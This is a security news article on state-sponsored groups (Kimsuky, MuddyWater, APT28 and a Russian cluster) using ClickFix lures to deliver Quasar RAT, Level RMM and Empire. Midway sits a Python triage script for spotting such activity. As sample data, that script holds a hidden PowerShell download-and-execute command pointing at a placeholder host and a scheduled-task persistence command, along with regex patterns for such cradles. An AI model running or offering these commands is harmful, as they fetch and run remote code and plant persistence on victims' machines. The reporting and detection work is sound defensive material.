Several state-sponsored hacking groups from Iran, North Korea and Russia have been found using the increasingly popular ClickFix social engineering tactic to deploy malware over a three-month period from late 2024 to early 2025.
The phishing campaigns adopting the technique have been attributed to clusters tracked as TA427 (aka Kimsuky), TA450 (aka MuddyWater), UNK_RemoteRogue, and TA422 (aka APT28).
ClickFix was initially an access methodology associated primarily with cybercrime groups, although the effectiveness of the approach has also led to its adoption by nation-state actors.
"The incorporation of ClickFix is not revolutionizing the campaigns carried out by TA427, TA450, UNK_RemoteRogue, and TA422, but instead is replacing the installation and execution stages in existing infection chains," Proofpoint noted in a report published today.
ClickFix, in a nutshell, refers to a deceptive technique that tricks users into infecting their own machines by following a series of instructions to copy, paste and run malicious commands under the pretext of fixing a problem, completing a CAPTCHA check or registering their device.
Proofpoint said it first observed Kimsuky using ClickFix in January and February 2025 as part of a phishing campaign that targeted individuals in fewer than five organizations in the think tank sector.
"TA427 made initial contact under the pretext of a meeting request from a spoofed sender, delivered to traditional TA427 targets working on North Korean affairs," the Proofpoint research team said.
"After a brief conversation to engage the target and build trust, as is often observed in TA427 activity, the attackers directed the target to an attacker-controlled site where they convinced the target to run a PowerShell command."
The company explained that the attack chain initiated a multi-stage sequence that ended with the deployment of an open-source remote access trojan called Quasar RAT.
The email message purported to come from a Japanese diplomat and asked the recipient to arrange a meeting with the Japanese ambassador to the United States. During the conversation, the threat actors sent a malicious PDF that contained a link to another document with a list of questions to be discussed during the meeting.
Clicking the link directed the victim to a fake landing page that imitated the Japanese embassy's website, which urged them to register their device by copying and pasting a command into the Windows Run dialog in order to download the questionnaire.
"The ClickFix PowerShell command retrieves and executes a second remote PowerShell command, which displayed the PDF presented to the user earlier in the chain (questionnaire.pdf)," Proofpoint said. "The document purported to be from Japan's Ministry of Foreign Affairs and contained questions concerning nuclear proliferation and nuclear policy in Northeast Asia."
The second PowerShell script is set up to create a Visual Basic script that runs every 19 minutes via a scheduled task, which, in turn, downloads two batch scripts that create, decode and execute the Quasar RAT payload. It is worth noting that this attack chain is a variation of one previously documented by Microsoft in February 2025.
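As an added defensive illustration (not from the Proofpoint report or this article), the following Python triages constructed Sysmon-style process-creation events for the two behaviours in the chain described above: a shell spawned from the Windows Run dialog carrying a download cradle, and a scheduled task that runs a script host every few minutes. The event fields, command lines, file paths and the example.invalid URL are all constructed sample data.

```python
import re

# Constructed Sysmon-style process-creation events (sample data, not from the report).
# Event 0 mimics a Run-dialog paste (explorer.exe -> powershell.exe with a download cradle),
# event 1 mimics the persistence step (task running a VBS every 19 minutes), 2 and 3 are benign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/reg | iex"'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": 'schtasks /create /sc minute /mo 19 /tn "Updater" /tr "wscript.exe C:\\Users\\Public\\u.vbs"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-ChildItem C:\\Users"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

# Download-cradle, hidden-window and encoded-command flags typically pasted in ClickFix lures.
CRADLE = re.compile(
    r"(?<![\w-])(iwr|invoke-webrequest|iex|invoke-expression|downloadstring|frombase64string"
    r"|-e(nc|ncodedcommand)?|-w(indowstyle)?\s+hidden|mshta)(?![\w-])", re.I)
# schtasks creating a minute-interval task whose action is a script host.
TASK = re.compile(
    r"schtasks(\.exe)?\s+/create.*?/sc\s+minute\s+/mo\s+(\d+).*?/tr\s+\"?([^\"]*"
    r"\b(wscript|cscript|powershell|mshta)\b[^\"]*)", re.I)
INTERACTIVE_PARENTS = ("explorer.exe",)  # Win+R (Run dialog) launches are children of explorer.exe
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event):
    """Return the reasons an event looks like a ClickFix-style execution; empty list if benign."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd, reasons = event["CommandLine"], []
    if parent in INTERACTIVE_PARENTS and image in SHELLS and CRADLE.search(cmd):
        reasons.append("shell spawned from explorer.exe with download/hidden/encoded flags")
    m = TASK.search(cmd)
    if m and int(m.group(2)) <= 60:
        reasons.append(f"scheduled task every {m.group(2)} min running script host: {m.group(3)}")
    return reasons

def scan(events):
    """Map event index -> reasons for every event that trips a rule."""
    findings = {}
    for i, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            findings[i] = reasons
    return findings
```

The explorer.exe parent check is what distinguishes a user-pasted Run-dialog command from an administrator's script launched from a console; tune the SHELLS and CRADLE lists to your environment's baseline before alerting.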
The second nation-state group to latch onto ClickFix is TA450, which used it to deploy the Level remote monitoring and management tool to maintain persistent access.
The phishing emails, sent on November 13 and 14, 2024, coincided with Microsoft's Patch Tuesday updates, masquerading as a security update from the tech giant and asking message recipients to follow ClickFix-style instructions to address the alleged vulnerability.
"The attackers employed the ClickFix technique, convincing the target to first launch PowerShell with administrator privileges, and then copy and run a command contained in the email body," Proofpoint said.
"The command is responsible for installing remote monitoring and management (RMM) software, in this case Level, after which TA450 operators abuse the RMM tool for espionage and data exfiltration from the target."
The TA450 ClickFix campaign is said to have targeted the finance, government, healthcare, education and transportation sectors in the Middle East, with a focus on the United Arab Emirates (UAE) and Saudi Arabia, as well as organizations in Canada, Germany, Switzerland and the U.S.
Also noted to have jumped on the ClickFix bandwagon is a suspected Russian group tracked as UNK_RemoteRogue, which at the end of last year used lures sent from suspected Zimbra servers that included a link to a Microsoft Office document.
Visiting the link displayed a page containing instructions to copy code from the browser into their terminal, along with a YouTube video tutorial on how to run PowerShell. The PowerShell command was equipped with JavaScript execution options that ran PowerShell code associated with the Empire command-and-control (C2) framework.
Proofpoint said the campaign sent 10 messages to individuals at two organizations related to a major weapons manufacturer in the defense industry. UNK_RemoteRogue was also found to share infrastructure overlaps with another phishing campaign that targeted defense and aerospace entities with references to the ongoing conflict in Ukraine in order to harvest webmail credentials through fake login pages.
"Numerous examples of state-sponsored actors using ClickFix have demonstrated not only the popularity of the technique among state actors, but also its use by different countries within a few weeks of each other," the company said. "Although not a consistently used technique, it is likely that more threat actors from North Korea, Iran and Russia have also tested and experimented with ClickFix, or will soon."